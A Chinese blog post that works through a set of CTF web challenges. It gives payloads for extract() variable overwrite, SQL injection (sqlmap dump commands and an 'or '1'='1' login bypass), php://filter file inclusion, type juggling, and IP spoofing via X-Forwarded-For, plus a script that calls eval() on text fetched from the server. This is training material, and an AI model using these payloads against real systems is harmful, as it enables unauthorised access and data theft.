20190423 CTF题-web

最新推荐文章于 2024-05-15 02:47:28 发布
最新推荐文章于 2024-05-15 02:47:28 发布
阅读量1.1k 收藏 2
点赞数
分类专栏: ★ CTF # ——【 SQL Inject】 # ——【 Code Audit】 # ——【 FileUpload/FileInclude】
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/dyw_666666/article/details/89465225
版权

签到题(代码审计-extract变量覆盖)

WEB1(SQL注入)

WEB2(万能语句登陆框)

WEB3(文件包含+php伪协议)

WEB4(脚本题)

WEB5(md5验证)

vim编辑器(备份文件+代码审计)

WEB7(伪造ip)

签到题(代码审计-extract变量覆盖)

很明显是一道关于extract变量覆盖的代码审计题。

需要满足下面两个条件:

  1. 利用extract传入空值覆盖$b和$a的值
  2. 还要满足$a==$c

Payload:

http://123.206.31.85:10001/?b=&a=

得到flag。

WEB1(SQL注入)

看到留言本很自然就想到SQL注入。

抓包保存为txt文件,sqlmap跑:

sqlmap.py -r 1.txt --current-db


sqlmap.py -r 1.txt -D web5 --tables

 sqlmap.py -r 1.txt -D web5 -T flag --dump

 

WEB2(万能语句登陆框)

一看就知道是sql注入题,用户名构造万能密码:'or '1' = '1' #   密码任意  得到flag。

WEB3(文件包含+php伪协议)

刚开始看到这道题的时候还以为是文件上传,但其实是考察文件包含漏洞+php伪协议

从url的 ?op=upload 其实就可以猜测出,只是把原本的file替换成了op。

 

Payload:

http://123.206.31.85:10003/?op=php://filter/read=convert.base64-encode/resource=flag

base64解码:

得到flag。

WEB4(脚本题)

说到快就得写脚本了。

# -*- coding:utf-8 -*-
import requests
import re

url = "http://123.206.31.85:10002/index.php"
session = requests.session()
r = session.post(url)
html = r.text
key = re.findall('(.*)</p>', html)
for i in key:
    r2 = session.post('http://123.206.31.85:10002/index.php',data ={'result':eval(i)})
    print(r2.text)

运行得到flag。

 

WEB5(md5验证)

根据页面title提示robots,访问robots.txt

访问shell.php

<?php
$a = 0;
for($a; $a<100000000; $a++){
	if(substr(md5($a),0,6) == '52aa16'){
		echo $a;
		exit();
	}
}
?>

执行后得到9288。

得到flag。

vim编辑器(备份文件+代码审计)

根据提示,观察url发现这是1ndex.php,而不是index.php。

抓包,修改为index.php,发现302跳转:

根据这道题的名字猜测,既然是用vim写的或许会有临时文件,果然在index.php~找到了。

<?php
header('content-type:text/html;charset=utf-8');
include './flag.php';
error_reporting(0);
if(empty($_GET['id'])){
    header('location:./1ndex.php');
}else{
	$id = $_GET['id'];
	if (!is_numeric($id)) {
		$id = intval($id);
		switch ($id) {
			case $id>=0:
				echo "快出去吧,走错路了~~~<br>";
				echo "这么简单都不会么?";
				break;
			case $id>=10:
				exit($flag);
				break;
			default:
				echo "你走不到这一步的!";
				break;
		}
	}
}
?>

代码审计。

Payload:

http://123.206.31.85:10015/index.php?id="10a"

 

WEB7(伪造ip)

进到页面后,查看一下源码。

结果找到这个:

base64解码后:

test123

尝试登陆,提示ip禁止访问:

猜测有可能需要本地访问,因此用火狐的 X-Forwarded-For Header插件 伪造127.0.0.1。

得到flag。

烟敛寒林o
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
【Writeup】第六季极客大挑战(部分目)
企鹅学coding~
10-31 6826
好久没做CTF了,一是感觉前几次网赛被虐的够呛,二是各种杂事也越来越多。偶然看到了网上这套成都信息工程大学的练习,感觉难度上比较适合我这种菜鸟,于是抽空做了一些,然而由于水平和时间原因最终也才完成11/41,这里就记录一下我解出的11道。以及将来学会的,也会在后面增加。
CTFWeb脚本
zip471642048的博客
01-06 1236
异或绕过 过滤了$、+、-、^、~使得异或自增和取反构造字符都无法使用,同时过滤了字母和数字。但是特意留了个或运算符| php部分 <?php $myfile = fopen("rce_or.txt", "w"); $contents=""; for ($i=0; $i < 256; $i++) { for ($j=0; $j <256 ; $j++) { if($i<16){ $hex_i='0'.dechex($i); } else{ $hex_
CTFHub技能书解笔记-RCE-读取源代码
qq_43006864的博客
03-30 1546
打开目,读取源代码。直接开整。 目界面就是源代码。和上一道一样,但是代码有所变化。 if ( substr($_GET["file"], 0, 6) === "php://" ) #返回file里面第0个到第6个字符,且要等于 php:// 。 那既然要等于php://,就和上一样,试试php://input 芜湖了,好像没用。这里的input是不起作用,看大佬说是allow_url_fopen没有开启。 目要求又必须使用php://。而且flag就在/flag里。 这里引...
网络安全最新CTF目合集_网络安全ctf大赛库(1),2024年最新网络安全高级面试2024
最新发布
2301_82257383的博客
05-15 1303
carrayjsondecodecm]):使用isnumeric函数检查数组d===false?
Oracle中的substr()函数 详解及应用
MINGDE_SKILL的博客
10-11 1890
1、substr函数格式 (俗称:字符截取函数)   格式1: substr(string string, int a, int b);   格式2:substr(string string, int a) ; 解释: 格式1: 1、string 需要截取的字符串 2、a 截取字符串的开始位置(注:当a等于0或1时,都是从第一位开始截取) ...
ctf此php是用vim编辑的,CTF实验吧-忘记密码了【vim编辑器备份文件】
weixin_33979216的博客
03-11 1328
内容:找回密码格式:SimCTF{ }解链接:http://ctf5.shiyanbar.com/10/upload/(略过查看源代码等最基本的步骤)首先首页让你输入注册邮箱找回密码,尝试admin,有弹窗显示消息: 复制提示信息至地址栏:发现可以看到step2的内容然后瞬间变成step1内容,打开bp准备逐步查看,获取step2页面内容: 代码中被选中的这一行很有意思,告诉了你编辑器是v...
CTF-AWD-WEB:AWD 模式下的WEB仓库
05-17
这个资源库"CTF-AWD-WEB-master"提供的试将帮助参与者提升他们的实战技能,深入理解Web安全攻防的原理,并能够在实际环境中应用这些知识。通过解,不仅可以锻炼漏洞挖掘和修复能力,还可以提升安全意识,对于...
bugkuctf-WEB
05-04
CTF(Capture The Flag)比赛中,Web安全领域是一个重要的环节,它涵盖了各种网络安全技能,如漏洞挖掘、代码审计、Web应用渗透测试等。本文主要针对"bugkuctf-WEB"这一主,结合描述中的CTF菜鸟的解经验...
ctfctf-pwn赛收集
03-31
CTF库通常由多个类别的挑战组成,例如Web安全、二进制反汇编、密码学、隐写术等。每个类别都包含多个挑战,每个挑战都有一个或多个标志(flag)。参赛者必须通过解决每个挑战来获取相应的标志,然后提交标志以获得...
CTF-WEB[GXYCTF 2019]BabyUpload
02-08
### CTF-WEB[GXYCTF 2019]BabyUpload分析 #### 知识点一:Web安全中的文件上传漏洞 在本目中,我们面对的是一个典型的Web安全问——文件上传漏洞。文件上传漏洞是Web应用程序中最常见的安全漏洞之一,它允许...
CTF库超详细资源合集
06-14
在传统的CTF线上⽐赛中,Web⽬是主要的型之⼀,相较于⼆进制、逆向等类型的⽬,参赛者不需掌握系统底层知识;相较于密码学、杂项问,不需具特别强的编程能⼒,故⼊门较为容易。Web⽬常见的漏洞类型...
目2-3-粗心的小明
博客地址 www.sec0nd.top
07-26 611
考查点:bak备份文件 打开正常页面显示flag is not here! 查看源代码也未发现flag 用扫描工具扫描后,发现存在index.php.bak备份文件 查看源代码发现flag
CTF-Web25(涉及简单的PHP代码审计-基础
→_→
09-28 829
25.PHP大法 分析: PHP函数: eregi()函数 —— 不区分大小写的检查一个字符串里是否包含另外一个字符串;可以使用%00截断绕过,匹配数组的话会返回NULL(与本无关),跟ereg()功能类似; <?php if(eregi("hackerDJ",$_GET[id])) { echo("<p>not allowed!</p>"); exit(); } $_GET[id] = urldecode($_GET[id]); if($.
CTFWeb-BUUCTF竞赛真WriteUp(1)_ctf no0b
yy1715713348的博客
03-15 1270
BUUCTF (北京联合大学CTF)平台拥有大量免费的 CTF 比赛真环境:此处记录下部分 Web 目练习过程。
CTF-Web-代码审计11
weixin_38131137的博客
07-04 1366
上一周新找的靶场里面的,最近太忙,花了快两周才做完,记录一下,免得做完忘记思路。 1、http://395115b6e98f1b6b21ee56eb5ef89614.synctf.com:8002/basic/base09/ 直接看到代码 可知道这个是文件包含?file=flag.txt 所以直接构造?file=flag.php 得到一段代码 可知这是一段加密代码,解密的话要用到decrypt,密钥有,相关要解密内容也有,直接写一段新的解密代码 编译得结果flag 2、http://3951..
NSS LitCTF Web 部分wp
Welcome To Myon'Blog !
05-21 803
1、PHP是世界上最好的语言!! 2、这是什么?SQL !注一下 ! 3、Ping 4、作业管理系统 5、我Flag呢? 6、1zjs 7、Vim yyds 8、Http pro max plus
CTF基础知识”和“Web信息泄露”解步骤
zwg147258369的博客
04-21 7350
CTF基础知识 一、CTF简介 1、打开目 2、点击进入“目附件”,寻找flag,在文章末尾 二、竞赛模式 1、打开目 2、点击进入“目附件”,寻找flag,在文档后部分 三、比赛形式 1、打开目 2、点击进入“目附件”,寻找flag,在文档结尾处 四、目类型 1、打开目 2、点击进入“目附件”,寻找flag,在文档末尾 Web信息泄露 一、目录遍历 1、打开目 2、点击开始寻找flag 3、这是点击进入后的界面 4、根据看到的目录,逐个打开,直到在上层目录中找到“
CTF,web,faster
qq_42937520的博客
03-09 825
一、打开目 二、查看源代码 查看源代码未发现有用东西。 三、BP抓包 发现自动跳转到1ndex.php界面。 目faster,尝试从打开目界面开始抓包,去掉1ndex.php,点击go 四、得到Flag Susctf{faster_as_you_can} ...
极客大挑战2016-部分wp
xuqi7
11-03 4993
签到 SYC{We1c0m3_To_G33k_2O!6} 闪的好快 Stegsolve  Frame Broswer模式,然后扫二维码就可以了 SYC{F1aSh_so_f4sT} xiao彩蛋 关注三叶草微博私信flag即可 SYC{2o16_Geek_c0m3_0n} Come_game 学弟大神做的,生成的一个save1文件中存储人物的
ctfshow-web-web红包
07-14
ctfshow-web-web红包是一道CTF比赛中的网络安全目。这道目的背景是一个在线购物网站,要求我们通过安全漏洞来获得网站的红包。 首先,我们可以检查网站的源代码,寻找可能存在的漏洞。在网站的前端页面中,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

烟敛寒林o

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值